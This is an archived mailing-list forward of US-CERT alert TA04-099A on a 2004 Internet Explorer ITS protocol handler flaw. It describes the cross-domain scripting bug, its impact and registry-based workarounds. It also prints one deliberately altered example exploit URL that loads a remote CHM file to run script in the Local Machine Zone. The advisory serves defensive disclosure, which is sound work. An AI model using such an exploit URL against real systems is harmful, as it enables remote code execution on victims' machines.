CRIME FW: US-CERT Technical Cyber Security Alert TA04-099A -- Vulnerability in Internet Explorer ITS Protocol Handler

From: George Heuston (GeorgeH@private)
Date: Thu Apr 08 2004 - 21:31:52 PDT

  • Next message: Zot O'Connor: "[Fwd: Request for ISEF to CRIME/WhiteKnightHackers]"

    -----Original Message-----
    From: US-CERT Technical Alerts [mailto:technical-alerts@us-cert.gov]
    Sent: Thu 4/8/2004 2:26 PM
    To: technical-alerts@us-cert.gov
    Subject: US-CERT Technical Cyber Security Alert TA04-099A -- Vulnerability in Internet Explorer ITS Protocol Handler 
     
    
    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    Vulnerability in Internet Explorer ITS Protocol Handler
    
       Original release date: April 8, 2004
       Last revised: --
       Source: US-CERT
    
    Systems Affected
    
         * Microsoft Windows systems running Internet Explorer
    
    Overview
    
       A cross-domain scripting vulnerability in Microsoft Internet Explorer
       (IE) could allow an attacker to execute arbitrary code with the
       privileges of the user running IE. The attacker could also read and
       manipulate data on web sites in other domains or zones.
    
    I. Description
    
       There is a cross-domain scripting vulnerability in the way ITS
       protocol handlers determine the security domain of an HTML component
       stored in a Compiled HTML Help (CHM) file. The HTML Help system
       "...uses the underlying components of Microsoft Internet Explorer to
       display help content. It supports HTML, ActiveX, Java, [and] scripting
       languages (JScript, and Microsoft Visual Basic Scripting Edition)."
       CHM files use the InfoTech Storage (ITS) format to store components
       such as HTML files, graphic files, and ActiveX objects. IE provides
       several protocol handlers that can access ITS files and individual CHM
       components: its:, ms-its:, ms-itss:, and mk:@MSITStore:. IE also has
       the ability to access parts of MIME Encapsulation of Aggregate HTML
       Documents (MHTML) using the mhtml: protocol handler.
    
       When IE references an inaccessible or non-existent MHTML file using
       the ITS and mhtml: protocols, the ITS protocol handlers can access a
       CHM file from an alternate source. IE incorrectly treats the CHM file
       as if it were in the same domain as the unavailable MHTML file. Using
       a specially crafted URL, an attacker can cause arbitrary script in a
       CHM file to be executed in a different domain, violating the
       cross-domain security model.
    
       Any programs that use the WebBrowser ActiveX control or the IE HTML
       rendering engine (MSHTML) may be affected by this vulnerability.
       Internet Explorer, Outlook, and Outlook Express are all examples of
       such programs. Any programs, including other web browsers, that use
       the IE protocol handlers (URL monikers) could function as attack
       vectors. Also, due to the way that IE determines MIME types, HTML and
       CHM files may not have the expected file name extensions (.htm/.html
       and .chm respectively).
    
       NOTE: Using an alternate web browser may not mitigate this
       vulnerability. It may be possible for a web browser other than IE on a
       Windows system to invoke IE to handle ITS protocol URLs.
    
       US-CERT is tracking this issue as VU#323070. This reference number
       corresponds to CVE candidate CAN-2004-0380.
    
    II. Impact
    
       By convincing a victim to view an HTML document such as a web page or
       HTML email message, an attacker could execute script in a different
       security domain than the one containing the attacker's document. By
       causing script to be run in the Local Machine Zone, the attacker could
       execute arbitrary code with the privileges of the user running IE. The
       attacker could also read or modify data in other web sites (including
       reading cookies or content and modifying or creating content).
    
       Publicly available exploit code exists for this vulnerability. US-CERT
       has monitored incident reports that indicate that this vulnerability
       is being exploited. The Ibiza trojan, variants of W32/Bugbear, and
       BloodHound.Exploit.6 are some example of malicious code that exploit
       this vulnerability. It is important to note that any arbitrary
       executable payload could be delivered via this vulnerability, and
       different anti-virus vendors may identify malicious code with
       different names.
    
       A malicious web site or email message may contain HTML similar to the
       following:
    
         ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//expl
         oit_chm::exploit_html
    
         (This URL is intentionally modified to avoid detection by
         anti-virus software.)
    
       In this example, HTML and script in exploit.html will be executed in
       the security context of the Local Machine Zone. It is common practice
       for exploit.html to either contain or download an executable payload
       such as a backdoor, trojan horse, virus, bot, or other malicious code.
    
       Note that it is possible to encode a URL in an attempt to bypass HTTP
       content inspection or anti-virus software.
    
    III. Solution
    
       Currently, there is no complete solution for this vulnerability. Until
       a patch is available, consider the workarounds listed below.
       Disable ITS protocol handlers
    
       Disabling ITS protocol handlers appears to prevent exploitation of
       this vulnerability. Delete or rename the following registry keys:
    
         HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-it
         ss,its,mk}
    
       Disabling these protocol handlers will significantly reduce the
       functionality of the Windows Help system and may have other unintended
       consequences. Plan to undo these changes after patches have been
       tested and installed. Follow good Internet security practices
    
       These recommended security practices will help to reduce exposure to
       attacks and mitigate the impact of cross-domain vulnerabilities.
    
         * Disable Active scripting and ActiveX controls
    
           NOTE: Disabling Active scripting and ActiveX controls will not
           prevent the exploitation of this vulnerability.
    
           Disabling Active scripting and ActiveX controls in the Internet
           and Local Machine Zones may stop certain types of attacks and will
           prevent exploitation of different cross-domain vulnerabilities.
    
           Disable Active scripting and ActiveX controls in any zones used to
           read HTML email.
    
           Disabling Active scripting and ActiveX controls in the Local
           Machine Zone will prevent malicious code that requires Active
           scripting and ActiveX controls from running. Changing these
           settings may reduce the functionality of scripts, applets, Windows
           components, or other applications. See Microsoft Knowledge Base
           Article 833633 for detailed information about security settings
           for the Local Machine Zone. Note that Service Pack 2 for Windows
           XP includes these changes.
    
         * Do not follow unsolicited links
    
           Do not click on unsolicited URLs received in email, instant
           messages, web forums, or Internet relay chat (IRC) channels.
    
         * Maintain updated anti-virus software
    
           Anti-virus software with updated virus definitions may identify
           and prevent some exploit attempts. Variations of exploits or
           attack vectors may not be detected. Do not rely solely on
           anti-virus software to defend against this vulnerability. More
           information about viruses and anti-virus vendors is available on
           the US-CERT Computer Virus Resources page.
    
    Appendix B. References
    
         * Vulnerability Note VU#323070 -
           <http://www.kb.cert.org/vuls/id/323070>
    
         * US-CERT Computer Virus Resources -
           <http://www.us-cert.gov/other_sources/viruses.html>
    
         * CVE CAN-2004-0380 -
           <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>
    
         * Introduction to URL Security Zones -
           <http://msdn.microsoft.com/workshop/security/szone/overview/overvi
           ew.asp>
    
         * About Cross-Frame Scripting and Security -
           <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_sec
           urity.asp>
    
         * MIME Type Determination in Internet Explorer -
           <http://msdn.microsoft.com/workshop/networking/moniker/overview/ap
           pendix_a.asp>
    
         * URL Monikers -
           <http://msdn.microsoft.com/workshop/networking/moniker/monikers.as
           p>
    
         * Asynchronous Pluggable Protocols -
           <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable
           .asp>
    
         * Microsoft HTML Help 1.4 SDK -
           <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Sta
           rt.asp>
    
         * Microsoft Knowledge Base Article 182569 -
           <http://support.microsoft.com/default.aspx?scid=182569>
    
         * Microsoft Knowledge Base Article 174360 -
           <http://support.microsoft.com/default.aspx?scid=174360>
    
         * Microsoft Knowledge Base Article 833633 -
           <http://support.microsoft.com/default.aspx?scid=833633>
    
         * Windows XP Service Pack 2 Technical Preview -
           <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.
           mspx >
    
         * AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>
         _________________________________________________________________
    
       This vulnerability was reported by Thor Larholm.
         _________________________________________________________________
    
       Feedback can be directed to the author: Art Manion.
         _________________________________________________________________
    
       Copyright 2004 Carnegie Mellon University.
    
       Terms of use:
    
    	 <http://www.us-cert.gov/legal.html>
    
       Revision History
    
       April 8, 2004: Initial release
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.2.1 (GNU/Linux)
    
    iD8DBQFAdbqQXlvNRxAkFWARAtfuAKD0NGSDWbtITNqXKmZk7qcbJD/h2QCfRlU/
    sWme3VvhRbvk9KjNUNyTsbY=
    =kL0G
    -----END PGP SIGNATURE-----
    



    This archive was generated by hypermail 2b30 : Thu Apr 08 2004 - 22:01:32 PDT